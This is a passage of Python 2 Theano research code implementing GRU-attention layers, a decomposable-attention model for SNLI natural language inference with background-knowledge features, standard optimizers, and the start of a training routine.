params[_p(prefix, 'Wx')] = Wx
Ux = ortho_weight(dim_nonlin)
params[_p(prefix, 'Ux')] = Ux
params[_p(prefix, 'bx')] = numpy.zeros((dim_nonlin,)).astype('float32')
U_nl = numpy.concatenate([ortho_weight(dim_nonlin),
ortho_weight(dim_nonlin)], axis=1)
params[_p(prefix, 'U_nl')] = U_nl
params[_p(prefix, 'b_nl')] = numpy.zeros((2 * dim_nonlin,)).astype('float32')
Ux_nl = ortho_weight(dim_nonlin)
params[_p(prefix, 'Ux_nl')] = Ux_nl
params[_p(prefix, 'bx_nl')] = numpy.zeros((dim_nonlin,)).astype('float32')
# context to LSTM
Wc = norm_weight(dimctx, dim * 2)
params[_p(prefix, 'Wc')] = Wc
Wcx = norm_weight(dimctx, dim)
params[_p(prefix, 'Wcx')] = Wcx
# attention: combined -> hidden
W_comb_att = norm_weight(dim, dimctx)
params[_p(prefix, 'W_comb_att')] = W_comb_att
# attention: context -> hidden
Wc_att = norm_weight(dimctx)
params[_p(prefix, 'Wc_att')] = Wc_att
# attention: hidden bias
b_att = numpy.zeros((dimctx,)).astype('float32')
params[_p(prefix, 'b_att')] = b_att
# attention:
U_att = norm_weight(dimctx, 1)
params[_p(prefix, 'U_att')] = U_att
c_att = numpy.zeros((1,)).astype('float32')
params[_p(prefix, 'c_tt')] = c_att
return params
def gru_cond_layer(tparams, state_below, options, prefix='gru',
mask=None, context=None, one_step=False,
init_memory=None, init_state=None,
context_mask=None,
**kwargs):
assert context, 'Context must be provided'
if one_step:
assert init_state, 'previous state must be provided'
nsteps = state_below.shape[0]
if state_below.ndim == 3:
n_samples = state_below.shape[1]
else:
n_samples = 1
# mask
if mask is None:
mask = tensor.alloc(1., state_below.shape[0], 1)
dim = tparams[_p(prefix, 'Wcx')].shape[1]
# initial/previous state
if init_state is None:
init_state = tensor.alloc(0., n_samples, dim)
# projected context
assert context.ndim == 3, \
'Context must be 3-d: #annotation x #sample x dim'
pctx_ = tensor.dot(context, tparams[_p(prefix, 'Wc_att')]) + \
tparams[_p(prefix, 'b_att')]
def _slice(_x, n, dim):
if _x.ndim == 3:
return _x[:, :, n * dim:(n + 1) * dim]
return _x[:, n * dim:(n + 1) * dim]
# projected x
state_belowx = tensor.dot(state_below, tparams[_p(prefix, 'Wx')]) + \
tparams[_p(prefix, 'bx')]
state_below_ = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + \
tparams[_p(prefix, 'b')]
def _step_slice(m_, x_, xx_, h_, ctx_, alpha_, pctx_, cc_,
U, Wc, W_comb_att, U_att, c_tt, Ux, Wcx,
U_nl, Ux_nl, b_nl, bx_nl):
preact1 = tensor.dot(h_, U)
preact1 += x_
preact1 = tensor.nnet.sigmoid(preact1)
r1 = _slice(preact1, 0, dim)
u1 = _slice(preact1, 1, dim)
preactx1 = tensor.dot(h_, Ux)
preactx1 *= r1
preactx1 += xx_
h1 = tensor.tanh(preactx1)
h1 = u1 * h_ + (1. - u1) * h1
h1 = m_[:, None] * h1 + (1. - m_)[:, None] * h_
# attention
pstate_ = tensor.dot(h1, W_comb_att)
pctx__ = pctx_ + pstate_[None, :, :]
# pctx__ += xc_
pctx__ = tensor.tanh(pctx__)
alpha = tensor.dot(pctx__, U_att) + c_tt
alpha = alpha.reshape([alpha.shape[0], alpha.shape[1]])
alpha = tensor.exp(alpha)
if context_mask:
alpha = alpha * context_mask
alpha = alpha / alpha.sum(0, keepdims=True)
ctx_ = (cc_ * alpha[:, :, None]).sum(0) # current context
preact2 = tensor.dot(h1, U_nl) + b_nl
preact2 += tensor.dot(ctx_, Wc)
preact2 = tensor.nnet.sigmoid(preact2)
r2 = _slice(preact2, 0, dim)
u2 = _slice(preact2, 1, dim)
preactx2 = tensor.dot(h1, Ux_nl) + bx_nl
preactx2 *= r2
preactx2 += tensor.dot(ctx_, Wcx)
h2 = tensor.tanh(preactx2)
h2 = u2 * h1 + (1. - u2) * h2
h2 = m_[:, None] * h2 + (1. - m_)[:, None] * h1
return h2, ctx_, alpha.T # pstate_, preact, preactx, r, u
seqs = [mask, state_below_, state_belowx]
# seqs = [mask, state_below_, state_belowx, state_belowc]
_step = _step_slice
shared_vars = [tparams[_p(prefix, 'U')],
tparams[_p(prefix, 'Wc')],
tparams[_p(prefix, 'W_comb_att')],
tparams[_p(prefix, 'U_att')],
tparams[_p(prefix, 'c_tt')],
tparams[_p(prefix, 'Ux')],
tparams[_p(prefix, 'Wcx')],
tparams[_p(prefix, 'U_nl')],
tparams[_p(prefix, 'Ux_nl')],
tparams[_p(prefix, 'b_nl')],
tparams[_p(prefix, 'bx_nl')]]
if one_step:
rval = _step(*(seqs + [init_state, None, None, pctx_, context] +
shared_vars))
else:
rval, updates = theano.scan(_step,
sequences=seqs,
outputs_info=[init_state,
tensor.alloc(0., n_samples,
context.shape[2]),
tensor.alloc(0., n_samples,
context.shape[0])],
non_sequences=[pctx_, context] + shared_vars,
name=_p(prefix, '_layers'),
n_steps=nsteps,
profile=profile,
strict=True)
return rval
'''
def init_params(options):
params = OrderedDict()
# embedding
params['Wemb'] = norm_weight(options['n_words_src'], options['dim_word'])
params['Wemb_dec'] = norm_weight(options['n_words'], options['dim_word'])
# encoder: bidirectional RNN
params = get_layer(options['encoder'])[0](options, params,
prefix='encoder',
nin=options['dim_word'],
dim=options['dim'])
params = get_layer(options['encoder'])[0](options, params,
prefix='encoder_r',
nin=options['dim_word'],
dim=options['dim'])
ctxdim = 2 * options['dim']
# init_state, init_cell
params = get_layer('ff')[0](options, params, prefix='ff_state',
nin=ctxdim, nout=options['dim'])
# decoder
params = get_layer(options['decoder'])[0](options, params,
prefix='decoder',
nin=options['dim_word'],
dim=options['dim'],
dimctx=ctxdim)
# readout
params = get_layer('ff')[0](options, params, prefix='ff_logit_lstm',
nin=options['dim'], nout=options['dim_word'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_prev',
nin=options['dim_word'],
nout=options['dim_word'], ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_ctx',
nin=ctxdim, nout=options['dim_word'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit',
nin=options['dim_word'],
nout=options['n_words'])
return params
'''
def init_params(options):
params = OrderedDict()
# embedding
#params['Wemb'] = norm_weight(options['dict_size'], options['dim_word'])
params['Wemb'] = options['allembs']
params['op_weights'] = norm_weight(options['op_num'] * options['op_dim'], options['op_dim'])
params['op_V'] = numpy.random.randn(options['op_num']).astype('float32')
# params['Wemb_dec'] = norm_weight(options['n_words'], options['dim_word'])
params = get_layer('ff')[0](options, params,
prefix='projOp',
nin=options['dim_word'],
nout=options['op_dim'])
# funcf
#params = get_layer('funcf_layer')[0](options, params,
# prefix='funcf',
# nin=options['dim_word'],
# nout=options['dim'])
# funcG
#params = get_layer('funcf_layer')[0](options, params,
# prefix='funcG',
# nin=options['dim_word'] * 2,
# nout=options['dim'])
#params = get_layer('ff')[0](options, params, prefix='bkProj',
# nin=options['dim'] + options['bk_dim'], nout=options['dim'],
# ortho=False)
#params = get_layer('ff')[0](options, params, prefix='WeightW',
# nin=options['bk_dim'], nout=1,
# ortho=False)
params = get_layer('ff')[0](options, params, prefix='funcG',
nin=options['dim'] * 2, nout=options['dim'],
ortho=False)
# readout
params = get_layer('ff')[0](options, params, prefix='ff_logit',
nin=options['dim'] * 2, nout=options['dim'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_linear',
nin=options['dim'], nout=options['class_num'],
ortho=False)
return params
def build_dam(tparams, options):
trng = RandomStreams(1234)
use_noise = theano.shared(numpy.float32(0.))
# description string: #words x #samples
x = tensor.matrix('x', dtype='int64')
bk_x = tensor.tensor4('x_bk', dtype='float32')
x_mask = tensor.matrix('x_mask', dtype='float32')
y = tensor.matrix('y', dtype='int64')
bk_y = tensor.tensor4('y_bk', dtype='float32')
y_mask = tensor.matrix('y_mask', dtype='float32')
#all_embs = tensor.matrix('emb', dtype='float32')
label = tensor.vector('label', dtype='int64')
n_timesteps_h = x.shape[0]
n_timesteps_t = y.shape[0]
n_samples = x.shape[1]
emb_h = tparams['Wemb'][x.flatten()]
emb_h = emb_h.reshape([n_timesteps_h, n_samples, options['dim_word']])
if options['use_dropout']:
emb_h = dropout_layer(emb_h, use_noise, trng)
emb_t = tparams['Wemb'][y.flatten()]
emb_t = emb_t.reshape([n_timesteps_t, n_samples, options['dim_word']])
if options['use_dropout']:
emb_t = dropout_layer(emb_t, use_noise, trng)
#proj_h = get_layer('funcf_layer')[1](tparams, emb_h, options,
# prefix='funcf')
#proj_t = get_layer('funcf_layer')[1](tparams, emb_t, options,
# prefix='funcf')
weight_matrix = tensor.batched_dot(emb_h.dimshuffle(1, 0, 2), emb_t.dimshuffle(1, 2, 0))
# bk_x
bk_x = bk_x.dimshuffle(1,0,2,3)
#bk_x = bk_x[:,:,:,(0,1,11,12)]
bk_m = theano.tensor.repeat(bk_x, repeats=options['op_dim'], axis=3)
bk_op = bk_m[:,:,:,:,None] * tparams['op_weights'][None,None,None,None,:,:]
bk_op = bk_op.reshape([n_samples, n_timesteps_h, n_timesteps_t, options['op_num'] * options['op_dim'],options['op_dim']])
bk_op = bk_op.dimshuffle(0,1,2,4,3)
emb_h_tmp = emb_h.dimshuffle(1,0,'x',2) + tensor.zeros([n_samples,n_timesteps_h,n_timesteps_t,options['dim']])
emb_h_tmp = emb_h_tmp.reshape([-1, options['dim_word']])
emb_h_tmp = get_layer('ff')[1](tparams, emb_h_tmp, options,prefix='projOp', activ='relu')
bk_op = bk_op.reshape([-1, options['op_dim'], options['op_num'] * options['op_dim']])
#emb_h_tmp.dimshuffle(0, 'x', 1) * r_hop.reshape [-1, options['op_num'], options['dim']
#r_hop = tensor.batched_dot(emb_h_tmp, bk_op)
bk_op = tensor.batched_dot(emb_h_tmp, bk_op)
emb_t_tmp = emb_t.dimshuffle(1,'x',0,2) + tensor.zeros([n_samples,n_timesteps_h,n_timesteps_t,options['dim']])
emb_t_tmp = emb_t_tmp.reshape([-1, options['dim_word']])
emb_t_tmp = get_layer('ff')[1](tparams, emb_t_tmp, options,prefix='projOp', activ='relu')
weight_bk = (bk_op.reshape([-1, options['op_num'], options['op_dim']]) * emb_t_tmp.dimshuffle(0, 'x', 1)).sum(2)
weight_bk = tensor.dot(tparams['op_V'], weight_bk.T)
weight_matrix = weight_matrix + weight_bk.reshape([n_samples, n_timesteps_h, n_timesteps_t])
weight_matrix_1 = tensor.exp(weight_matrix - weight_matrix.max(1, keepdims=True)).dimshuffle(1,2,0)
weight_matrix_2 = tensor.exp(weight_matrix - weight_matrix.max(2, keepdims=True)).dimshuffle(1,2,0)
# lenH * lenT * batchSize
alpha_weight = weight_matrix_1 * x_mask.dimshuffle(0, 'x', 1)/ weight_matrix_1.sum(0, keepdims=True)
beta_weight = weight_matrix_2 * y_mask.dimshuffle('x', 0, 1)/ weight_matrix_2.sum(1, keepdims=True)
##bk_y = bk_y.dimshuffle(2, 0, 1, 3)
#emb_h_bk = theano.tensor.repeat(emb_h[:,None,:,:],repeats=n_timesteps_t, axis=1)
#emb_h_bk = theano.tensor.concatenate([emb_h_bk,bk_y.dimshuffle(2,0,1,3)], axis=3)
#emb_h_bk = get_layer('ff')[1](tparams, emb_h_bk, options,prefix='bkProj', activ='relu')
## lenH * lenT * bachSize * dim
##bk_x = bk_x.dimshuffle(0, 2, 1, 3)
#emb_t_bk = theano.tensor.repeat(emb_t[None,:,:,:],repeats=n_timesteps_h, axis=0)
#emb_t_bk = concatenate([emb_t_bk,bk_x.dimshuffle(0,2,1,3)], axis=3)
#emb_t_bk = get_layer('ff')[1](tparams, emb_t_bk, options,prefix='bkProj', activ='relu')
alpha = (emb_h.dimshuffle(0, 'x', 1, 2) * alpha_weight.dimshuffle(0, 1, 2, 'x')).sum(0)
beta = (emb_t.dimshuffle('x', 0, 1, 2) * beta_weight.dimshuffle(0, 1, 2, 'x')).sum(1)
#alpha = (emb_h_bk * alpha_weight.dimshuffle(0, 1, 2, 'x')).sum(0)
#beta = (emb_t_bk * beta_weight.dimshuffle(0, 1, 2, 'x')).sum(1)
v1 = concatenate([emb_h, beta], axis=2)
v2 = concatenate([emb_t, alpha], axis=2)
proj_v1 = get_layer('ff')[1](tparams, v1, options,prefix='funcG', activ='relu')
proj_v2 = get_layer('ff')[1](tparams, v2, options, prefix='funcG', activ='relu')
logit1 = (proj_v1 * x_mask[:, :, None]).sum(0)
logit2 = (proj_v2 * y_mask[:, :, None]).sum(0)
logit = concatenate([logit1, logit2], axis=1)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options, prefix='ff_logit', activ='tanh')
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options, prefix='ff_logit_linear', activ='linear')
probs = tensor.nnet.softmax(logit)
predict_label = probs.argmax(axis=1 )
#cost = -tensor.log(probs)[tensor.arange(label.shape[0]), label]
cost = tensor.nnet.categorical_crossentropy(probs, label)
return trng, use_noise, x, x_mask, bk_x, y, y_mask, bk_y, label, predict_label, cost
# build a training model
def build_model(tparams, options):
opt_ret = dict()
trng = RandomStreams(1234)
use_noise = theano.shared(numpy.float32(0.))
# description string: #words x #samples
x = tensor.matrix('x', dtype='int64')
x_mask = tensor.matrix('x_mask', dtype='float32')
y = tensor.matrix('y', dtype='int64')
y_mask = tensor.matrix('y_mask', dtype='float32')
# for the backward rnn, we just need to invert x and x_mask
xr = x[::-1]
xr_mask = x_mask[::-1]
n_timesteps = x.shape[0]
n_timesteps_trg = y.shape[0]
n_samples = x.shape[1]
# word embedding for forward rnn (source)
emb = tparams['Wemb'][x.flatten()]
emb = emb.reshape([n_timesteps, n_samples, options['dim_word']])
proj = get_layer(options['encoder'])[1](tparams, emb, options,
prefix='encoder',
mask=x_mask)
# word embedding for backward rnn (source)
embr = tparams['Wemb'][xr.flatten()]
embr = embr.reshape([n_timesteps, n_samples, options['dim_word']])
projr = get_layer(options['encoder'])[1](tparams, embr, options,
prefix='encoder_r',
mask=xr_mask)
# context will be the concatenation of forward and backward rnns
ctx = concatenate([proj[0], projr[0][::-1]], axis=proj[0].ndim - 1)
# mean of the context (across time) will be used to initialize decoder rnn
ctx_mean = (ctx * x_mask[:, :, None]).sum(0) / x_mask.sum(0)[:, None]
# or you can use the last state of forward + backward encoder rnns
# ctx_mean = concatenate([proj[0][-1], projr[0][-1]], axis=proj[0].ndim-2)
# initial decoder state
init_state = get_layer('ff')[1](tparams, ctx_mean, options,
prefix='ff_state', activ='tanh')
# word embedding (target), we will shift the target sequence one time step
# to the right. This is done because of the bi-gram connections in the
# readout and decoder rnn. The first target will be all zeros and we will
# not condition on the last output.
emb = tparams['Wemb_dec'][y.flatten()]
emb = emb.reshape([n_timesteps_trg, n_samples, options['dim_word']])
emb_shifted = tensor.zeros_like(emb)
emb_shifted = tensor.set_subtensor(emb_shifted[1:], emb[:-1])
emb = emb_shifted
# decoder - pass through the decoder conditional gru with attention
proj = get_layer(options['decoder'])[1](tparams, emb, options,
prefix='decoder',
mask=y_mask, context=ctx,
context_mask=x_mask,
one_step=False,
init_state=init_state)
# hidden states of the decoder gru
proj_h = proj[0]
# weighted averages of context, generated by attention module
ctxs = proj[1]
# weights (alignment matrix)
opt_ret['dec_alphas'] = proj[2]
# compute word probabilities
logit_lstm = get_layer('ff')[1](tparams, proj_h, options,
prefix='ff_logit_lstm', activ='linear')
logit_prev = get_layer('ff')[1](tparams, emb, options,
prefix='ff_logit_prev', activ='linear')
logit_ctx = get_layer('ff')[1](tparams, ctxs, options,
prefix='ff_logit_ctx', activ='linear')
logit = tensor.tanh(logit_lstm + logit_prev + logit_ctx)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options,
prefix='ff_logit', activ='linear')
logit_shp = logit.shape
probs = tensor.nnet.softmax(logit.reshape([logit_shp[0] * logit_shp[1],
logit_shp[2]]))
# cost
y_flat = y.flatten()
y_flat_idx = tensor.arange(y_flat.shape[0]) * options['n_words'] + y_flat
cost = -tensor.log(probs.flatten()[y_flat_idx])
cost = cost.reshape([y.shape[0], y.shape[1]])
cost = (cost * y_mask).sum(0)
return trng, use_noise, x, x_mask, y, y_mask, opt_ret, cost
# build a sampler
def build_sampler(tparams, options, trng, use_noise):
x = tensor.matrix('x', dtype='int64')
xr = x[::-1]
n_timesteps = x.shape[0]
n_samples = x.shape[1]
# word embedding (source), forward and backward
emb = tparams['Wemb'][x.flatten()]
emb = emb.reshape([n_timesteps, n_samples, options['dim_word']])
embr = tparams['Wemb'][xr.flatten()]
embr = embr.reshape([n_timesteps, n_samples, options['dim_word']])
# encoder
proj = get_layer(options['encoder'])[1](tparams, emb, options,
prefix='encoder')
projr = get_layer(options['encoder'])[1](tparams, embr, options,
prefix='encoder_r')
# concatenate forward and backward rnn hidden states
ctx = concatenate([proj[0], projr[0][::-1]], axis=proj[0].ndim - 1)
# get the input for decoder rnn initializer mlp
ctx_mean = ctx.mean(0)
# ctx_mean = concatenate([proj[0][-1],projr[0][-1]], axis=proj[0].ndim-2)
init_state = get_layer('ff')[1](tparams, ctx_mean, options,
prefix='ff_state', activ='tanh')
print 'Building f_init...',
outs = [init_state, ctx]
f_init = theano.function([x], outs, name='f_init', profile=profile)
print 'Done'
# x: 1 x 1
y = tensor.vector('y_sampler', dtype='int64')
init_state = tensor.matrix('init_state', dtype='float32')
# if it's the first word, emb should be all zero and it is indicated by -1
emb = tensor.switch(y[:, None] < 0,
tensor.alloc(0., 1, tparams['Wemb_dec'].shape[1]),
tparams['Wemb_dec'][y])
# apply one step of conditional gru with attention
proj = get_layer(options['decoder'])[1](tparams, emb, options,
prefix='decoder',
mask=None, context=ctx,
one_step=True,
init_state=init_state)
# get the next hidden state
next_state = proj[0]
# get the weighted averages of context for this target word y
ctxs = proj[1]
logit_lstm = get_layer('ff')[1](tparams, next_state, options,
prefix='ff_logit_lstm', activ='linear')
logit_prev = get_layer('ff')[1](tparams, emb, options,
prefix='ff_logit_prev', activ='linear')
logit_ctx = get_layer('ff')[1](tparams, ctxs, options,
prefix='ff_logit_ctx', activ='linear')
logit = tensor.tanh(logit_lstm + logit_prev + logit_ctx)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options,
prefix='ff_logit', activ='linear')
# compute the softmax probability
next_probs = tensor.nnet.softmax(logit)
# sample from softmax distribution to get the sample
next_sample = trng.multinomial(pvals=next_probs).argmax(1)
# compile a function to do the whole thing above, next word probability,
# sampled word for the next target, next hidden state to be used
print 'Building f_next..',
inps = [y, ctx, init_state]
outs = [next_probs, next_sample, next_state]
f_next = theano.function(inps, outs, name='f_next', profile=profile)
print 'Done'
return f_init, f_next
# generate sample, either with stochastic sampling or beam search. Note that,
# this function iteratively calls f_init and f_next functions.
def gen_sample(tparams, f_init, f_next, x, options, trng=None, k=1, maxlen=30,
stochastic=True, argmax=False):
# k is the beam size we have
if k > 1:
assert not stochastic, \
'Beam search does not support stochastic sampling'
sample = []
sample_score = []
if stochastic:
sample_score = 0
live_k = 1
dead_k = 0
hyp_samples = [[]] * live_k
hyp_scores = numpy.zeros(live_k).astype('float32')
hyp_states = []
# get initial state of decoder rnn and encoder context
ret = f_init(x)
next_state, ctx0 = ret[0], ret[1]
next_w = -1 * numpy.ones((1,)).astype('int64') # bos indicator
for ii in xrange(maxlen):
ctx = numpy.tile(ctx0, [live_k, 1])
inps = [next_w, ctx, next_state]
ret = f_next(*inps)
next_p, next_w, next_state = ret[0], ret[1], ret[2]
if stochastic:
if argmax:
nw = next_p[0].argmax()
else:
nw = next_w[0]
sample.append(nw)
sample_score -= numpy.log(next_p[0, nw])
if nw == 0:
break
else:
cand_scores = hyp_scores[:, None] - numpy.log(next_p)
cand_flat = cand_scores.flatten()
ranks_flat = cand_flat.argsort()[:(k - dead_k)]
voc_size = next_p.shape[1]
trans_indices = ranks_flat / voc_size
word_indices = ranks_flat % voc_size
costs = cand_flat[ranks_flat]
new_hyp_samples = []
new_hyp_scores = numpy.zeros(k - dead_k).astype('float32')
new_hyp_states = []
for idx, [ti, wi] in enumerate(zip(trans_indices, word_indices)):
new_hyp_samples.append(hyp_samples[ti] + [wi])
new_hyp_scores[idx] = copy.copy(costs[idx])
new_hyp_states.append(copy.copy(next_state[ti]))
# check the finished samples
new_live_k = 0
hyp_samples = []
hyp_scores = []
hyp_states = []
for idx in xrange(len(new_hyp_samples)):
if new_hyp_samples[idx][-1] == 0:
sample.append(new_hyp_samples[idx])
sample_score.append(new_hyp_scores[idx])
dead_k += 1
else:
new_live_k += 1
hyp_samples.append(new_hyp_samples[idx])
hyp_scores.append(new_hyp_scores[idx])
hyp_states.append(new_hyp_states[idx])
hyp_scores = numpy.array(hyp_scores)
live_k = new_live_k
if new_live_k < 1:
break
if dead_k >= k:
break
next_w = numpy.array([w[-1] for w in hyp_samples])
next_state = numpy.array(hyp_states)
if not stochastic:
# dump every remaining one
if live_k > 0:
for idx in xrange(live_k):
sample.append(hyp_samples[idx])
sample_score.append(hyp_scores[idx])
return sample, sample_score
# calculate the log probablities on a given corpus using translation model
def pred_probs(f_log_probs, prepare_data, options, iterator, verbose=False):
probs = []
n_done = 0
correct_num = 0
all_num = 0.
for x, x_syn, y, y_syn, label in iterator:
n_done += len(x)
all_num += len(label)
x, x_mask, bk_x, y, y_mask, bk_y, label = prepare_data(x, x_syn, y, y_syn, label,
n_words_src=options['n_words_src'], bk_for_x=options['bk_for_x'],
bk_for_y=options['bk_for_y'], bk_dim=options['bk_dim'],
maxlen= options['maxlen'],n_words=options['n_words'])
pprobs, predict_label = f_log_probs(x, x_mask, bk_x, y, y_mask, bk_y, label)
for pp in pprobs:
probs.append(pp)
if numpy.isnan(numpy.mean(probs)):
ipdb.set_trace()
if verbose:
print >> sys.stderr, '%d samples computed' % (n_done)
correct_num += (label == predict_label).sum()
print 'correct ', correct_num, 'all ', all_num
return numpy.array(probs), correct_num/all_num
# optimizers
# name(hyperp, tparams, grads, inputs (list), cost) = f_grad_shared, f_update
def adam(lr, tparams, grads, inp, cost, beta1=0.9, beta2=0.999, e=1e-8):
gshared = [theano.shared(p.get_value() * 0., name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
f_grad_shared = theano.function(inp, cost, updates=gsup, profile=profile)
updates = []
t_prev = theano.shared(numpy.float32(0.))
t = t_prev + 1.
lr_t = lr * tensor.sqrt(1. - beta2 ** t) / (1. - beta1 ** t)
for p, g in zip(tparams.values(), gshared):
m = theano.shared(p.get_value() * 0., p.name + '_mean')
v = theano.shared(p.get_value() * 0., p.name + '_variance')
m_t = beta1 * m + (1. - beta1) * g
v_t = beta2 * v + (1. - beta2) * g ** 2
step = lr_t * m_t / (tensor.sqrt(v_t) + e)
p_t = p - step
updates.append((m, m_t))
updates.append((v, v_t))
updates.append((p, p_t))
updates.append((t_prev, t))
upreturn = [ item for sublist in updates for item in sublist]
f_update = theano.function([lr], upreturn, updates=updates,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
def adadelta(lr, tparams, grads, inp, cost):
print 'adadelta'
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rup2' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup + rg2up,
profile=profile)
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads, running_up2,
running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(itemlist(tparams), updir)]
f_update = theano.function([lr], [], updates=ru2up + param_up,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup + rgup + rg2up,
profile=profile)
updir = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_updir' % k)
for k, p in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(p, p + udn[1])
for p, udn in zip(itemlist(tparams), updir_new)]
f_update = theano.function([lr], [], updates=updir_new + param_up,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
def sgd(lr, tparams, grads, inp, cost):
gshared = [theano.shared(p.get_value() * 0.,
name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
f_grad_shared = theano.function(inp, cost, updates=gsup,
profile=profile)
pup = [(p, p - lr * g) for p, g in zip(itemlist(tparams), gshared)]
f_update = theano.function([lr], [], updates=pup, profile=profile)
return f_grad_shared, f_update
def train(dim_word=100, # word vector dimensionality
dim=1000, # the number of LSTM units
bk_dim=13,
class_num=3,
op_num=3,
op_dim=50,
encoder='gru',
decoder='gru_cond',
patience=1000000, # early stopping patience
max_epochs=5000,
finish_after=10000000, # finish after this many updates
dispFreq=100,
decay_c=0., # L2 regularization penalty
alpha_c=0., # alignment regularization
clip_c=-1., # gradient clipping threshold
lrate=0.01, # learning rate
n_words_src=100000, # source vocabulary size
n_words=100000, # target vocabulary size
maxlen=100, # maximum length of the description
optimizer='rmsprop',
batch_size=16,
valid_batch_size=16,
saveto='modelOp.npz',
validFreq=1000,
saveFreq=1000, # save the parameters after every saveFreq updates
sampleFreq=100, # generate some samples after every sampleFreq
train_datasets=[
'../data/train_h_fix.tok',
'../data/train_t_fix.tok',
'../data/train_label.tok',
'../data/train_syn_h.syntok',
'../data/train_syn_t.syntok'],
valid_datasets=[
'../data/dev_h_fix.tok',
'../data/dev_t_fix.tok',
'../data/dev_label.tok',
'../data/dev_syn_h.syntok',
'../data/dev_syn_t.syntok'],
test_datasets=[
'../data/test_h_fix.tok',
'../data/test_t_fix.tok',
'../data/test_label.tok',
'../data/test_syn_h.syntok',
'../data/test_syn_t.syntok'],
dictionaries=[
'../data/snli_dict_fix.pkl',
'../data/bk_dict.pkl'],
embedings=[
'../data/snli_emb_300_fix.pkl'],
bk_dicts=[
'../data/bk_for_x.pkl',
'../data/bk_for_y.pkl'],
use_dropout=False,
reload_=False,
overwrite=False):
# Model options
model_options = locals().copy()
log = logging.getLogger(os.path.basename(__file__).split('.')[0])
# load dictionaries and invert them
worddicts = [None] * len(dictionaries)
worddicts_r = [None] * len(dictionaries)
for ii, dd in enumerate(dictionaries):
with open(dd, 'rb') as f:
worddicts[ii] = pkl.load(f)
worddicts_r[ii] = dict()
for kk, vv in worddicts[ii].iteritems():
worddicts_r[ii][vv] = kk
print 'Loading embedings ...'
with open(embedings[0], 'rb') as f:
pretrained_embs = pkl.load(f)
#pretrained_embs = theano.shared(pretrained_embs, name='pretrained_embs')
print 'Done'
model_options['allembs'] = pretrained_embs
print 'Loading bks ...'
with open(bk_dicts[0], 'rb') as f:
bk_for_x = pkl.load(f)
model_options['bk_for_x'] = bk_for_x
with open(bk_dicts[1], 'rb') as f:
bk_for_y = pkl.load(f)
model_options['bk_for_y'] = bk_for_x
print 'Done'
# reload options
if reload_ and os.path.exists(saveto):
print 'Reloading model options'
with open('%s.pkl' % saveto, 'rb') as f:
model_options = pkl.load(f)
print 'Loading data'
train = TextIterator(train_datasets[0], train_datasets[1],
train_datasets[2], train_datasets[3], train_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=batch_size,
maxlen=maxlen)
valid = TextIterator(valid_datasets[0], valid_datasets[1],
valid_datasets[2],valid_datasets[3],valid_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=valid_batch_size,
maxlen=maxlen)
test = TextIterator(test_datasets[0], test_datasets[1],
test_datasets[2], test_datasets[3], test_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=valid_batch_size,
maxlen=maxlen)
print 'Building model'
params = init_params(model_options)
# reload parameters
if reload_ and os.path.exists(saveto):
print 'Reloading model parameters'
params = load_params(saveto, params)
tparams = init_tparams(params)
trng, use_noise, \
x, x_mask, bk_x, y, y_mask, bk_y, label, predict_label, \
cost = \
build_dam(tparams, model_options)
inps = [x, x_mask, bk_x, y, y_mask, bk_y, label]
# print 'Building sampler'
# f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
# before any regularizer
print 'Building f_log_probs...',
